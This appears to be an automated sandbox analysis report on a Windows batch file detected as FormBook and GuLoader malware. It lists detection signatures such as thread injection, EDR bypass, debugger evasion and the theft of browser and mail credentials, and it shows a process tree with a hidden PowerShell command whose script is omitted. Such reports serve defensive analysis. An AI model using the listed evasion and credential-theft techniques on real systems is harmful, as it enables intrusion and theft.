Windows
Analysis Report
Doc_004024024001.bat
Overview
General Information
Detection
FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
  - cmd.exe (PID: 5828 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Doc_004024024001.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    - conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    - powershell.exe (PID: 5984 cmdline: powershell.exe -windowstyle hidden "[long obfuscated PowerShell script omitted]")